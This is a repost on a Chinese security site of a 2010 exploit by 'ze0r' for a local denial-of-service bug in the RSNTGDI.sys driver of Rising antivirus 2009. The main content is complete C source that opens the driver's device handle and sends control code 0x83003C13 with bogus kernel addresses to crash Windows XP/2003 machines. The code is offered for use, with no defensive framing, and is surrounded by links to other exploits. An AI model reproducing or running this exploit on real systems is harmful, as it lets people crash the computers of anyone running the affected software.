首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rising RSNTGDI.sys Local Denial of Service Vulnerability
来源:http://www.ze0r.com/ 作者:ze0r 发布时间:2010-11-02  

/*
On the net.We can found these file has published a BUG.In that.The BUG has found in CONTROL CODE:0x83003C0B.So.I check these file
in othere CONTROL CODE.Just for fun.....

# Exploit Title: [Rising RSNTGDI.sys Local Denial of Service(CONTROL CODE:83003C13) ]
# Date: [2010.11.1]
# Author: [ ze0r ]
# Version: [Rising 2009.Publish Date:2009.10.13.]
# Tested on: [Windows XPSP3 Chinese Simplified & Windows 2003 Chinese Simplified]
*/


#include "stdio.h"
#include "windows.h"

HANDLE DriverHandle =0;

void boom(PVOID systembuffer,PVOID userbuffer)
{
 printf("userbuffer Is:%p\n\n",userbuffer);
 printf("The systembuffer Is:%p\n\n",systembuffer);
 DeviceIoControl(DriverHandle,
 0x83003C13,
 systembuffer,
 20,
 userbuffer,
 20,
 (DWORD *)0,
 0);
 return ;
}

int main(int argc, char* argv[])
{
 printf("-------------------------------------------------------------------------------\n");
 printf("---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\n");
 printf("----------------------------------QQ:289791332---------------------------------\n");
 printf("-------------------------------------------------------------------------------\n\n");
 DriverHandle=CreateFile("\\\\.\\rsntgdi",
 0,
 FILE_SHARE_READ | FILE_SHARE_WRITE ,
 0,
 OPEN_EXISTING,0,0);
 if (DriverHandle == INVALID_HANDLE_VALUE)
 {
  printf("Open Driver Error!\n\n");
  return 0 ;
 }
 
 printf("OK.Let's Crash It!\n\n");
 getchar();

 boom((PVOID)0x88888888,(PVOID)0x88888888);
 
 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xerox 4595 Denial of Service V
·Yaws 1.89 Directory Traversal
·Trend Micro Titanium Maximum S
·discuz 7.0-7.2 get shell
·Sybase Advantage Data Architec
·Mongoose Web Server 2.11 Direc
·AVG Internet Security v9.0.851
·MetInfo 3.0 (fckeditor) Arbitr
·Linux kernel arbitrary write m
·Quickzip 5.1.8.1 Denial of Ser
·Auto CMS <= 1.8 Remote Code Ex
·Maxthon 3.0.18.1000 CSS Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved